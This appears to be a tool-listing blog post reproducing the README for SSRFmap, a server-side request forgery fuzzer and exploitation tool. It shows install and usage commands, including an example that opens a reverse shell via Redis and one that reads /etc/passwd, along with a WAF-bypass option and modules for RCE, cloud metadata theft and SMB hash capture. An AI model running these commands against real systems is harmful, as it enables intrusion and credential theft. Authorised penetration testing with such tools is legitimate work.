SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool
SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
Guide / RTFM
Basic install from the Github repository.
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--level [LEVEL] Level of test to perform (1-5, default: 1)# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...data/example.py SSRF service.FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfilesModules
The following modules are already implemented and can be used with the
-m argument.| Name | Description |
|---|---|
fastcgi | FastCGI RCE |
redis | Redis RCE |
github | Github Enterprise RCE < 2.8.7 |
zaddix | Zaddix RCE |
mysql | MySQL Command execution |
docker | Docker Infoleaks via API |
smtp | SMTP send mail |
portscan | Scan ports for the host |
networkscan | HTTP Ping sweep over the network |
readfiles | Read files such as /etc/passwd |
alibaba | Read files from the provider (e.g: meta-data, user-data) |
aws | Read files from the provider (e.g: meta-data, user-data) |
digitalocean | Read files from the provider (e.g: meta-data, user-data) |
socksproxy | SOCKS4 Proxy |
smbhash | Force an SMB authentication via a UNC Path |
Inspired by
- All you need to know about SSRF and how may we write tools to do auto-detect - Auxy
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai
- Blog on Gopherus Tool -SpyD3r
- Gopherus - Github
- SSRF testing - cujanovic
SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool
Reviewed by Zion3R
on
9:39 AM
Rating:
Reviewed by Zion3R
on
9:39 AM
Rating:
